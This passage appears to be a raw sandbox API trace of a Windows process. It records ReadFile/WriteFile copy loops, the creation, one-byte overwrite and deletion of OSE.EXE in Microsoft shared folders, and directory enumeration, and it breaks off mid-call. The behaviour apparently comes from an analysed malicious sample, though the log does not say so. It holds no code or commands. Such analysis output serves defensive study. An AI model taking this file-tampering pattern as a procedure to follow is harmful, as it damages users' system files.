[0102.095] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.095] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.095] GetLastError () returned 0x0 [0102.095] SetLastError (dwErrCode=0x0) [0102.095] GetLastError () returned 0x0 [0102.095] SetLastError (dwErrCode=0x0) [0102.095] GetLastError () returned 0x0 [0102.095] SetLastError (dwErrCode=0x0) [0102.095] GetLastError () returned 0x0 [0102.095] SetLastError (dwErrCode=0x0) [0102.095] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.096] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.096] GetLastError () returned 0x0 [0102.096] SetLastError (dwErrCode=0x0) [0102.096] GetLastError () returned 0x0 [0102.096] SetLastError (dwErrCode=0x0) [0102.096] GetLastError () returned 0x0 [0102.096] SetLastError (dwErrCode=0x0) [0102.096] GetLastError () returned 0x0 [0102.096] SetLastError (dwErrCode=0x0) [0102.096] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.096] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.096] GetLastError () returned 0x0 [0102.096] SetLastError (dwErrCode=0x0) [0102.097] GetLastError () returned 0x0 [0102.097] SetLastError (dwErrCode=0x0) [0102.097] GetLastError () returned 0x0 [0102.097] SetLastError (dwErrCode=0x0) [0102.097] GetLastError () returned 0x0 [0102.097] SetLastError (dwErrCode=0x0) [0102.097] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.097] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.097] GetLastError () returned 0x0 [0102.097] SetLastError (dwErrCode=0x0) [0102.097] GetLastError () returned 0x0 [0102.097] SetLastError (dwErrCode=0x0) [0102.097] GetLastError () returned 0x0 [0102.097] SetLastError (dwErrCode=0x0) [0102.097] GetLastError () returned 0x0 [0102.097] SetLastError (dwErrCode=0x0) [0102.097] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.098] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.098] GetLastError () returned 0x0 [0102.098] SetLastError (dwErrCode=0x0) [0102.098] GetLastError () returned 0x0 [0102.098] SetLastError (dwErrCode=0x0) [0102.098] GetLastError () returned 0x0 [0102.098] SetLastError (dwErrCode=0x0) [0102.098] GetLastError () returned 0x0 [0102.098] SetLastError (dwErrCode=0x0) [0102.098] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.098] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.098] GetLastError () returned 0x0 [0102.098] SetLastError (dwErrCode=0x0) [0102.098] GetLastError () returned 0x0 [0102.098] SetLastError (dwErrCode=0x0) [0102.098] GetLastError () returned 0x0 [0102.098] SetLastError (dwErrCode=0x0) [0102.099] GetLastError () returned 0x0 [0102.099] SetLastError (dwErrCode=0x0) [0102.099] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.099] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.099] GetLastError () returned 0x0 [0102.099] SetLastError (dwErrCode=0x0) [0102.099] GetLastError () returned 0x0 [0102.099] SetLastError (dwErrCode=0x0) [0102.099] GetLastError () returned 0x0 [0102.099] SetLastError (dwErrCode=0x0) [0102.099] GetLastError () returned 0x0 [0102.099] SetLastError (dwErrCode=0x0) [0102.099] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0xa48, lpOverlapped=0x0) returned 1 [0102.099] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.099] GetLastError () returned 0x0 [0102.099] SetLastError (dwErrCode=0x0) [0102.099] GetLastError () returned 0x0 [0102.100] SetLastError (dwErrCode=0x0) [0102.100] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0102.100] GetLastError () returned 0x0 [0102.100] SetLastError (dwErrCode=0x0) [0102.100] GetLastError () returned 0x0 [0102.100] SetLastError (dwErrCode=0x0) [0102.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0102.100] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327ef70*=0xa50, lpOverlapped=0x0) returned 1 [0102.100] GetLastError () returned 0x0 [0102.100] SetLastError (dwErrCode=0x0) [0102.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.100] GetLastError () returned 0x0 [0102.100] SetLastError (dwErrCode=0x0) [0102.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0102.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0102.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0102.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0102.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0102.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x996d8 | out: hHeap=0x20000) returned 1 [0102.100] CloseHandle (hObject=0x27c) returned 1 [0102.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x986d0 | out: hHeap=0x20000) returned 1 [0102.101] CloseHandle (hObject=0x368) returned 1 [0102.101] AreFileApisANSI () returned 1 [0102.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0102.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 69 [0102.101] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.103] GetFileType (hFile=0x368) returned 0x1 [0102.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0102.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x986d0 [0102.104] GetLastError () returned 0xb7 [0102.104] SetLastError (dwErrCode=0xb7) [0102.104] WriteFile (in: hFile=0x368, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0102.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x986d0 | out: hHeap=0x20000) returned 1 [0102.105] CloseHandle (hObject=0x368) returned 1 [0102.105] AreFileApisANSI () returned 1 [0102.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0102.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 69 [0102.105] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe")) returned 1 [0102.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0102.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0102.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0102.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0102.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x570e0 | out: hHeap=0x20000) returned 1 [0102.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b8b0 | out: hHeap=0x20000) returned 1 [0102.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0102.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0102.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.107] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4a3, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="\x02", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧羐\x07̧비聐萨\x08賂̧")) returned 0 [0102.107] FindClose (in: hFindFile=0x77f90 | out: hFindFile=0x77f90) returned 1 [0102.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0102.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0102.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0102.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0102.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0102.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0102.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0102.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0102.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0102.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0102.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8aa88 [0102.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.108] AreFileApisANSI () returned 1 [0102.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpUsedDefaultChar=0x0) returned 58 [0102.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0102.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0102.108] AreFileApisANSI () returned 1 [0102.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0102.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0102.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 58 [0102.108] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.108] GetLastError () returned 0x5 [0102.108] GetLastError () returned 0x5 [0102.108] SetLastError (dwErrCode=0x5) [0102.108] GetLastError () returned 0x5 [0102.108] SetLastError (dwErrCode=0x5) [0102.108] GetLastError () returned 0x5 [0102.108] SetLastError (dwErrCode=0x5) [0102.109] AreFileApisANSI () returned 1 [0102.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0102.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0102.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 58 [0102.109] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.109] GetLastError () returned 0x5 [0102.109] GetLastError () returned 0x5 [0102.109] SetLastError (dwErrCode=0x5) [0102.109] GetLastError () returned 0x5 [0102.109] SetLastError (dwErrCode=0x5) [0102.109] GetLastError () returned 0x5 [0102.109] SetLastError (dwErrCode=0x5) [0102.109] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.109] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.109] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.109] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0102.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a790 [0102.109] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b56882, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="TextConv", cAlternateFileName="")) returned 1 [0102.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.109] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78310 [0102.110] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b5538f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.110] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xff, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bears.htm", cAlternateFileName="")) returned 1 [0102.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0102.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0102.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0102.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0102.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0102.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0102.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0102.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0102.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0102.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0102.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0102.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0102.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0102.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, 